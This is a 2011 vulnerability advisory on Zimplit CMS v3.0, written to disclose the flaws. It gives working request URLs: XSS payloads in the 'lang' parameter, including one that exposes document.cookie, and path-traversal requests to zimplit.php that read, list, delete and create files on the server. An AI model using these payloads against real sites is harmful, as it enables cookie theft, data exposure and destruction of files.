Advisory: 		Multiple vulnerabilities in Zimplit CMS
Advisory ID: 		SSCHADV2011-012
Author: 		Stefan Schurtz
Affected Software: 	v3.0
Vendor URL: 		http://www.zimplit.com/
Vendor Status: 		informed
CVE-ID: 		-
 
======================
Vulnerability Description:
======================

The Zimplit CMS is prone to multiple vulnerabilities.
 
==============
Technical Details:
==============

Cross-Site-Scripting

http://<target>/zimplit.php?lang=<script>alert(XSS)</script>
http://<target>/zimplit.php?lang=<script>alert(document.cookie)</script>

There are some LFI possibilities with the zimplit.php file

itīs possible to read some files on the system

http://<target>/zimplit.php?action=load&file=../../<file.txt>

browse the filesystem

http://<target>/zimplit.php?action=listAllFiles&file=../../../../

delete files

http://<target>/zimplit.php?action=delete&file=../<file>

create files

http://<target>/zimplit.php?action=new&file=../<file>

=====
Solution:
=====

-

================
Disclosure Timeline:
================

04-Sep-2011 - informed developers
05-Sep-2011 - Release date of this security advisory

====
Credits:
====

Vulnerability found and advisory written by Stefan Schurtz.

=======
References:
=======

http://www.zimplit.com/
http://www.rul3z.de/advisories/SSCHADV2011-012.txt